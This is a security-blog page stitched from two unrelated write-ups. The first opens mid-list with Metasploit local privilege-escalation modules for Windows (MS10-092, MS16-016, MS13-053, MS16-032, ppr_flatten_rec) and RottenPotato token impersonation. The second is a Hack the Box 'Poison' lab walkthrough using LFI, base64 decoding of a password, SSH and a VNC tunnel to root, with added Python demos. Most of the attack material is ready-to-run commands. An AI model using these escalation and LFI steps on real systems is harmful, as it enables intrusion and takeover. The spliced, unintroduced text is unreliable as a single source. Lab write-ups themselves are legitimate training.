A vulnerability in Task Scheduler could allow elevation of privilege.
The security update for it (MS10-092) resolves a publicly disclosed vulnerability in Windows Task Scheduler. The vulnerability could allow elevation of privilege if an attacker logged on to an affected system and ran a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit it; it cannot be exploited remotely or by anonymous users.
This module has been tested on vulnerable builds of Windows Vista, Windows 7, Windows Server 2008 x64 and x86
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
MS16-016 mrxdav.sys WebDav Local Privilege Escalation
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.
This module has been tested on the vulnerable build of Windows 7 SP1, x86 architecture
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 5.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-iw1y3u6GH1M/W5X9evbEaeI/AAAAAAAAaNg/3QcpMpIN05ovTwktiPuk6zVqyLOUsfHjQCEwYBhgL/s1600/5.png?w=687)
EPATHOBJ::pprFlattenRec Local Privilege Escalation
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory.
At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit
Another Meterpreter session gets opened, once the selected exploit has been executed
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 6.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-50JEITNrWAg/W5X9e6spKLI/AAAAAAAAaNo/PJNJTAojY-gLRGgb_4uUWcvGM-xlfI-dACEwYBhgL/s1600/6.png?w=687)
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
A kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome’s sandbox. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.
At the moment, the module has been tested successfully on Windows 7 SP1 x86
Let’s navigate to MSF console and execute this exploit
use exploit/windows/local/ms13_053_schlamperei
set lhost 192.168.1.107
set session 1
exploit
Once the exploit has run, another Meterpreter session opens. Confirm the privilege level:
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 7.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-XINCEa0_D58/W5X9fGJI9hI/AAAAAAAAaNk/45xBBBPUChAT9vj5mil5-6hn204WZmIMgCEwYBhgL/s1600/7.png?w=687)
MS16-032 Secondary Logon Handle Privilege Escalation
This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect Windows 7 through 10 and Server 2008 through 2012, 32- and 64-bit. The module only works against versions of Windows with PowerShell 2.0 or later, and only on systems with two or more CPU cores.
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit
Once the exploit has run, another Meterpreter session opens. Confirm the privilege level:
getsystem
getuid
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 8.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-P1arpdUb6W0/W5X9fU2tK1I/AAAAAAAAaNo/IgS6EQNIgusnGBrRmrvNloR8dXCVECmJQCEwYBhgL/s1600/8.png?w=687)
RottenPotato
RottenPotato escalates from a service account to SYSTEM. It needs a context that holds SeImpersonatePrivilege (check with getprivs in Meterpreter), which service accounts such as those used by IIS or SQL Server typically have.
It is important to impersonate the token (or run list_tokens -u) quickly after running the binary: with the current implementation, the token disappears shortly after the binary is run. It is also important to follow the order of the steps, and to load incognito before running the binary.
Incognito, now a Meterpreter extension, was originally a stand-alone application for impersonating user tokens once a system had been compromised. The first thing to do is check whether any valid tokens already exist on the system:
load incognito
list_tokens -u
As the output shows, no impersonation or delegation tokens are available yet.
![[Image: 23.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-jvqLb_hkAKY/WvHAyYuuwLI/AAAAAAAAWxc/To2KOzpvQuk2vV9BhIeVtf0yrmrWPmv-wCLcBGAs/s1600/23.png?w=687)
Now download RottenPotato from GitHub; the repository ships a prebuilt rottenpotato.exe.
git clone https://github.com/foxglovesec/RottenPotato.git
cd RottenPotato
Upload the executable to the victim's machine from the Meterpreter session:
upload /root/Desktop/RottenPotato/rottenpotato.exe .
![[Image: 24.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-DSMHJCIuauc/WvHAyk4CtmI/AAAAAAAAWxg/lx-2mzCBgG4cZ8veWoztGTe0PgRslm11wCLcBGAs/s1600/24.png?w=687)
Now execute it (hidden and channelized) and, immediately afterwards, impersonate the SYSTEM token it makes available:
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
As we can see, we are now running as the privileged Windows user NT AUTHORITY\SYSTEM.
![[Image: 25.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-d0Fw4LlIplo/WvHAzKr2FhI/AAAAAAAAWxk/7u57iMzI5-chBzetF-j0h99qHC9bH7bgwCLcBGAs/s1600/25.png?w=687)
Hello everyone and welcome to yet another CTF challenge from Hack the Box, called ‘Poison,’ which is available online for those who want to increase their skills in penetration testing and black box testing. Poison is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.
Level: Easy
Task: Find user.txt and root.txt in the victim’s machine
Methodology:
- Port scanning
- Using LFI to find the username
- Gaining encrypted password file using LFI
- Decrypting password file
- Logging in to SSH using a decrypted password
- Transferring ZIP file and extracting to find a secret file
- Discovery of VNC on the machine
- VNC tunneling over SSH to get a root shell
- Grabbing flag
Since these labs have a static IP, the address for Poison is 10.10.10.84. Let us scan the VM with nmap:
nmap -A 10.10.10.84
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-HTJoUo0_wsk/W5QI3HGkOLI/AAAAAAAAaKI/0LkjsJ5WHQQiwXrlqbKDS1i379mrnLmDACEwYBhgL/s1600/1.png?w=687&ssl=1)
From the result above we found two open ports on the VM, 22 and 80, the default ports for SSH and HTTP.
We headed straight to the web page.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-f_EWGI2zc_A/W5QI5Tf0dPI/AAAAAAAAaKk/eUrHTThaqKAgEmnTRaYi70qZPXiYG5w0gCEwYBhgL/s1600/2.png?w=687&ssl=1)
Just reading the page made it clear that an LFI vulnerability was involved: the page takes a script name and includes that file. We tested it by entering /etc/passwd as the script name.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-w9e0or2f_UI/W5QI5gzaEDI/AAAAAAAAaKo/lzwZckSk4joHA1kqpmlBmHhKna9k83lMQCEwYBhgL/s1600/3.png?w=687&ssl=1)
Which led us to the following output
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-jreCi41jVCY/W5QI6DG9qQI/AAAAAAAAaKw/x3ZmeiFdJO89yNu1VRjirESW4btM5C1wACEwYBhgL/s1600/4.png?w=687&ssl=1)
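How that test works, shown with an added Python model (this is not the box's PHP, which the writeup does not reproduce; the web root and the two files are constructed in a temporary directory for the demonstration): the script joins whatever name it is given onto its directory and includes the result, so an absolute path such as /etc/passwd, or a ../ walk, is read from wherever it points. The contained resolver beside it is the shape of the fix.

```python
from __future__ import annotations

import os
import tempfile


def unsafe_resolve(web_root: str, requested: str) -> str:
    """Model of an unchecked include($_GET['file']).

    os.path.join discards everything before an absolute component, so
    "/etc/passwd" comes back untouched, and normpath walks "../" straight
    out of the web root.  This is the behaviour the LFI relies on.
    """
    return os.path.normpath(os.path.join(web_root, requested))


def safe_resolve(web_root: str, requested: str) -> str:
    """Resolve `requested` only if it stays inside web_root and names a .php script.

    realpath() collapses ".." and follows symlinks *before* the containment
    check, so a symlink inside the root pointing at /etc/passwd is refused too.
    Comparing the raw string against the root is the classic mistake.
    """
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"path escapes web root: {requested!r}")
    if not target.endswith(".php"):
        raise ValueError(f"not an includable script: {requested!r}")
    return target


def rejects(web_root: str, requested: str) -> bool:
    """True when the hardened resolver refuses `requested`."""
    try:
        safe_resolve(web_root, requested)
    except ValueError:
        return True
    return False


def make_demo_root() -> str:
    """Constructed stand-in for the web root holding two files the writeup names."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    for name in ("listfiles.php", "pwdbackup.txt"):
        with open(os.path.join(root, name), "w", encoding="ascii") as fh:
            fh.write(f"placeholder for {name}\n")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    for probe in ("listfiles.php", "pwdbackup.txt", "/etc/passwd", "../../../../etc/passwd"):
        verdict = "rejected" if rejects(root, probe) else "served"
        print(f"{probe:26} unchecked -> {unsafe_resolve(root, probe)}  hardened -> {verdict}")
```

Run it to see the four probes side by side: the unchecked resolver hands back /etc/passwd for both the absolute and the traversal form, while the contained one refuses both, and also refuses pwdbackup.txt, which is exactly the file the writeup reads through the bug.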
From here we found that the username was "charix". But before moving on, we tried all the script names listed on the previous page, one by one.
It was monotonous until we found an interesting text file through the "listfiles.php" script.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-NmTvKW0mKLs/W5QI55ZRC-I/AAAAAAAAaLQ/io3Brf2ENpkDIFWUg1PYD--aYLV2zd83gCEwYBhgL/s1600/5.png?w=687&ssl=1)
listfiles.php was a script that enumerated an array of the files in the directory.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-szS8-TfVMCQ/W5QI6ocRwDI/AAAAAAAAaLU/kfYq1e8vRoosZJexvHmkAUYVrItFMsIYwCEwYBhgL/s1600/6.png?w=687&ssl=1)
We found an interesting file called pwdbackup.txt. On opening it by the same process we found an encrypted password.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-Bm9L2fHHK1A/W5QI7X5-fiI/AAAAAAAAaLY/SisOZY7BCvIFVXLrl0oqz7jM44gs2cZEACEwYBhgL/s1600/7.png?w=687&ssl=1)
But it wasn't encryption at all: the value had been base64-encoded 13 times over, which is recognisable on sight. So we copied the text into a file, removed the whitespace between the lines (present by default) and ran base64 -d thirteen times in a pipeline:
cat decode | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-BnXWVE6Q3lI/W5QI7VcW4EI/AAAAAAAAaLY/IP05ec4UF1Mrz5q7BXkRxH_53DWSfX7FQCEwYBhgL/s1600/8.png?w=687&ssl=1)
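The thirteen-stage pipe works when you already know the depth. The added Python below (not from the writeup) peels layers until the output stops being valid base64 or stops being printable text, so it handles any depth and, because of the second check, does not decode a plaintext that merely happens to be a valid base64 string one step too far. The sample it decodes is constructed here by encoding the password recovered in this step 13 times with line wrapping, standing in for pwdbackup.txt.

```python
from __future__ import annotations

import base64
import binascii
import string

_PRINTABLE = set(string.printable)


def _is_printable_text(data: bytes) -> bool:
    """True if `data` is ASCII consisting only of printable characters or whitespace."""
    try:
        return all(ch in _PRINTABLE for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def peel_base64(blob: str, max_layers: int = 64) -> tuple[str, int]:
    """Decode nested base64 until the result stops looking like base64.

    Whitespace (the line wrapping base64 tools emit) is dropped before each
    attempt.  Decoding stops when the strict decoder rejects the input or when
    the decoded bytes are no longer printable text; that second check keeps a
    plaintext such as "password" (eight alphabet characters, so itself valid
    base64) from being decoded into garbage.
    Returns (plaintext, number_of_layers_removed).
    """
    current = blob.encode("ascii")
    layers = 0
    while layers < max_layers:
        stripped = b"".join(current.split())
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded or not _is_printable_text(decoded):
            break
        current, layers = decoded, layers + 1
    return current.decode("ascii"), layers


def _wrap_encode(data: bytes, width: int = 76) -> bytes:
    """base64-encode with 76-column line wrapping, as the backup file was laid out."""
    enc = base64.b64encode(data)
    return b"\n".join(enc[i:i + width] for i in range(0, len(enc), width)) + b"\n"


def build_sample(secret: str, layers: int) -> str:
    """Constructed stand-in for pwdbackup.txt: `secret` wrapped in `layers` base64 layers."""
    data = secret.encode("ascii")
    for _ in range(layers):
        data = _wrap_encode(data)
    return data.decode("ascii")


if __name__ == "__main__":
    sample = build_sample("Charix!2#4%6&8(0", 13)
    plain, n = peel_base64(sample)
    print(f"removed {n} layers -> {plain}")
```

The strict decoder (validate=True) is what makes the stop condition reliable: GNU base64 -d tolerates newlines but rejects other non-alphabet bytes, and the function mirrors that by stripping whitespace itself and letting anything else terminate the loop.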
Voila! The password was found to be Charix!2#4%6&8(0
It was a guess that this might also be the SSH password for the user we had found, so we tried logging in:
ssh charix@10.10.10.84
ls
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0P7yDby5N5g/W5QI7RR5nOI/AAAAAAAAaLU/gMlr3yL0mRUjnw_1hbPscw31A6cCqJdtQCEwYBhgL/s1600/9.png?w=687&ssl=1)
And just like that, we were logged in! We found the first flag (user.txt) and another file called secret.zip.
We tried unzipping it on the spot but it didn't work, so instead we copied the file to our own machine with scp and extracted it there:
scp charix@10.10.10.84:secret.zip /root/Desktop/
cd Desktop
unzip secret.zip
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-uYaA4j9zYX0/W5QI3K10s3I/AAAAAAAAaLE/0MQTMaOLkGYkBXIbB99H0dYQMN6uu9wMwCEwYBhgL/s1600/10.png?w=687&ssl=1)
We got a file, "secret", which could be the password for another service.
We were not convinced that no other service was running, so we listed the listening sockets on the victim with sockstat:
sockstat -4 -l
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-BljkGNAbdkQ/W5QI4LstcuI/AAAAAAAAaLQ/Bd3xeXp3FzY4pK-sRoMdZJciLkyuR2qFQCEwYBhgL/s1600/11.png?w=687&ssl=1)
Ports 5901 and 5908 were listening, and those are VNC ports (display N listens on 5900+N). Neither showed up in the nmap scan, so they are reachable only from the box itself. This could be our way in.
We used SSH local port forwarding to reach the VNC port through the SSH session:
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Cc0zkjhygPY/W5QI4WIpU7I/AAAAAAAAaLI/81esUzLyLcUgDNKVVzbmeLGYpIVC5BO8gCEwYBhgL/s1600/12.png?w=687&ssl=1)
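As an added example, not from the writeup: the sockstat step and the tunnel step can be tied together. The Python below parses sockstat -4 -l output, keeps only the TCP services bound to 127.0.0.1 (the ones an external nmap cannot see), maps 59xx ports to VNC display numbers and emits the matching ssh -L command. The sockstat listing is constructed in the FreeBSD column layout with the two ports the writeup reports; it is not the real output from the box, which the writeup shows only as a screenshot.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample laid out like FreeBSD `sockstat -4 -l` output.
# It is an illustration, not the real listing from the box.
SAMPLE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sshd       620   4  tcp4   *:22                  *:*
www      httpd      634   4  tcp4   *:80                  *:*
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5908        *:*
root     syslogd    456   7  udp4   *:514                 *:*
"""

# One row: USER COMMAND PID FD PROTO LOCAL FOREIGN.  The header row has no
# numeric PID/FD, so it simply fails to match and is skipped.
_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<fd>\d+)\s+"
    r"(?P<proto>\S+)\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s*$"
)


@dataclass(frozen=True)
class Listener:
    user: str
    command: str
    proto: str
    address: str   # "*" means every interface
    port: int


def parse_sockstat(text: str) -> list[Listener]:
    """Turn sockstat rows into Listener records."""
    rows = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        address, _, port = m["local"].rpartition(":")
        rows.append(Listener(m["user"], m["cmd"], m["proto"], address, int(port)))
    return rows


def loopback_only(listeners: list[Listener]) -> list[Listener]:
    """TCP services bound to 127.0.0.1: usable from the box, invisible to an external scan."""
    return [l for l in listeners if l.proto.startswith("tcp") and l.address == "127.0.0.1"]


def vnc_display(port: int) -> int | None:
    """RFB convention: display N listens on TCP 5900+N."""
    return port - 5900 if 5900 <= port < 6000 else None


def ssh_tunnel_command(user: str, host: str, listeners: list[Listener]) -> str:
    """One ssh invocation forwarding every loopback-only port to the same port locally."""
    forwards = [f"-L {l.port}:127.0.0.1:{l.port}" for l in listeners]
    return " ".join(["ssh", *forwards, f"{user}@{host}"])


if __name__ == "__main__":
    hidden = loopback_only(parse_sockstat(SAMPLE_SOCKSTAT))
    for l in hidden:
        disp = vnc_display(l.port)
        tag = f"VNC display :{disp}" if disp is not None else "non-VNC"
        print(f"{l.command:8} {l.address}:{l.port}  {tag}")
    print(ssh_tunnel_command("charix", "10.10.10.84", hidden))
```

The filter on the bind address is the point: a service on 127.0.0.1 never appears in a scan from the attacker's host, so the only way to confirm it exists is from a shell on the box, and the only way to talk to it from outside is through a forwarded port.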
This opens a shell and keeps the tunnel up for as long as the session stays open. In a new terminal, connect through the forwarded port. The -passwd option takes a VNC password file (the password stored in VNC's own obfuscated format), and the "secret" file extracted from the zip is exactly that:
vncviewer -passwd secret 127.0.0.1:5901
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-O7TVy_KQRoU/W5QI4g8tOdI/AAAAAAAAaLM/U7JkbBCnnBQr8dnq0VNb3XR9mNltikC7QCEwYBhgL/s1600/13.png?w=687&ssl=1)
We saw an authentication successful message!
All that was left was to:
ls
cat root.txt
And this is how we owned the poison VM. Hope you enjoyed because we sure did!
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-qUxjjSWk8Lk/W5QI5CVMoWI/AAAAAAAAaLQ/qUmB3wxgzFgrA4xiB8FFVLWzqXcTJuvQgCEwYBhgL/s1600/14.png?w=687&ssl=1)
Author: Harshit R